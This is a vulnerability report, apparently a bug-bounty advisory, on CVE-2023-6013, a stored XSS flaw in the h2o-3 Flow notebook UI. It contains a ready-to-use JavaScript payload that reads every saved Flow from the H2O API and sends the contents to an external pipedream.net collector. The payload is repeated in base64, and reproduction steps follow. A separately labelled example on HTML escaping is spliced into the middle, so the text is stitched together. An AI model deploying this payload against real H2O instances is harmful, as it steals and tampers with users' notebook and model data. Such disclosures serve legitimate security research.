CVE-2023-6013: Leaking/modulation Flows/Model data via stored xss in h2o-3

H2O is vulnerable to a stored XSS vulnerability, which can lead to a Local File Include attack.

Description

In h2o-3, the data of all open Flows can be leaked or tampered with through a stored XSS vulnerability, and information in the model can be read or modified.

Proof of Concept

hijack = (data) => {
    window.open(`https://b89f8f617e7792dc04cbdf2efbd5e0c9.m.pipedream.net/?data=${data}`)
}
flows_data = '';
flows_name = [];
fetch('http://localhost:54321/3/NodePersistentStorage/notebook')
    .then((x) => x.text())
    .then((x) => flows_data = JSON.parse(x))
    .then(() => {
        for(i = 0; i < flows_data['entries'].length; i++){
            flows_name.push(flows_data['entries'][i]['name'])
        }
    })
    .then(() => {
        for(i = 0; i < flows_name.length; i++){
            fetch(`http://localhost:54321/3/NodePersistentStorage/notebook/${flows_name[i]}`)
                .then((x) => x.text())
                .then((x) => hijack(x))
        }
    })

// aGlqYWNrID0gKGRhdGEpID0+IHsKICAgIHdpbmRvdy5vcGVuKGBodHRwczovL2I4OWY4ZjYxN2U3NzkyZGMwNGNiZGYyZWZiZDVlMGM5Lm0ucGlwZWRyZWFtLm5ldC8/ZGF0YT0ke2RhdGF9YCkKfQpmbG93c19kYXRhID0gJyc7CmZsb3dzX25hbWUgPSBbXTsKZmV0Y2goJ2h0dHA6Ly9sb2NhbGhvc3Q6NTQzMjEvMy9Ob2RlUGVyc2lzdGVudFN0b3JhZ2Uvbm90ZWJvb2snKQogICAgLnRoZW4oKHgpID0+IHgudGV4dCgpKQogICAgLnRoZW4oKHgpID0+IGZsb3dzX2RhdGEgPSBKU09OLnBhcnNlKHgpKQogICAgLnRoZW4oKCkgPT4gewogICAgICAgIGZvcihpID0gMDsgaSA8IGZsb3dzX2RhdGFbJ2VudHJpZXMnXS5sZW5ndGg7IGkrKyl7CiAgICAgICAgICAgIGZsb3dzX25hbWUucHVzaChmbG93c19kYXRhWydlbnRyaWVzJ11baV1bJ25hbWUnXSkKICAgICAgICB9CiAgICB9KQogICAgLnRoZW4oKCkgPT4gewogICAgICAgIGZvcihpID0gMDsgaSA8IGZsb3dzX25hbWUubGVuZ3RoOyBpKyspewogICAgICAgICAgICBmZXRjaChgaHR0cDovL2xvY2FsaG9zdDo1NDMyMS8zL05vZGVQZXJzaXN0ZW50U3RvcmFnZS9ub3RlYm9vay8ke2Zsb3dzX25hbWVbaV19YCkKICAgICAgICAgICAgICAgIC50aGVuKCh4KSA9PiB4LnRleHQoKSkKICAgICAgICAgICAgICAgIC50aGVuKCh4KSA9PiBoaWphY2soeCkpCiAgICAgICAgfQogICAgfSk=

The payload that leaks data from all Flows is shown above. To use it without errors, you need to base64-encode it.
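The root cause described above is that attacker-controlled notebook content is rendered as markup. The following is an added example, not code from h2o-3 or from the advisory author: it models a generic notebook viewer with a constructed notebook (the cell shape, the "md"/"cs" type names and the marker payload are all assumptions) and contrasts the vulnerable concatenation pattern with the standard mitigation of HTML-escaping every untrusted value before it is placed in markup.

```javascript
// Added example, not h2o-3 code: models the stored-XSS condition in a
// generic notebook viewer and shows the baseline mitigation (HTML escaping).

// Constructed sample shaped loosely like a saved notebook. Cell text is
// attacker-controlled, because anyone who can save a Flow controls it.
const SAMPLE_NOTEBOOK = {
  name: "leak_poc",
  cells: [
    { type: "md", input: "# Summary of <b>results</b>" },
    { type: "cs", input: "getFrames" },
    // Constructed marker payload; a real stored payload would run whatever
    // script the notebook author embedded.
    { type: "md", input: "<script>document.title='xss-marker'</script>" },
  ],
};

// Map each HTML-significant character to its entity so the browser parses
// the value as text rather than as markup.
const ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Vulnerable pattern: cell text is concatenated straight into markup, so a
// <script> element (or an event-handler attribute) stored in the notebook
// executes in the viewer's origin as soon as the Flow is opened.
function renderCellUnsafe(cell) {
  return `<div class="cell ${cell.type}">${cell.input}</div>`;
}

// Hardened pattern: the body is escaped, and the class name is restricted to
// a known allow-list so it cannot break out of the attribute.
function renderCellSafe(cell) {
  const type = ["md", "cs"].includes(cell.type) ? cell.type : "unknown";
  return `<div class="cell ${type}">${escapeHtml(cell.input)}</div>`;
}

function renderNotebook(notebook, renderCell) {
  return notebook.cells.map(renderCell).join("\n");
}

// Quick check a reviewer can run over rendered output: no raw <script> tag
// should survive escaping.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log(renderNotebook(SAMPLE_NOTEBOOK, renderCellSafe));
```

Escaping is the baseline, not the whole fix: where a cell is meant to carry rich content (rendered Markdown, for instance), the rendered HTML must be passed through an allow-list sanitizer instead, since escaping would destroy the intended formatting while leaving the Markdown renderer's own output unchecked.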

How to build

# Build H2O
git clone https://github.com/h2oai/h2o-3.git
cd h2o-3
./gradlew build -x test

You may encounter problems, e.g. npm missing; install it with:
brew install npm

# Start H2O
java -jar build/h2o.jar

# Point browser to http://localhost:54321

Steps to Reproduce

  1. Go to http://localhost:54321/flow/index.html
  2. Open the sample file: Sample Data.flow
  3. Open the PoC file: leak_poc.flow
  4. Click the play button in the leak_poc flow

Poc File

https://drive.google.com/drive/folders/1yINoutLUbj2-kpJHsqiGPxz7jkpBI4MX?usp=sharing

All PoCs and videos can be found on Google Drive above.

Impact

All data in this service can be tampered with or leaked without the user's permission.
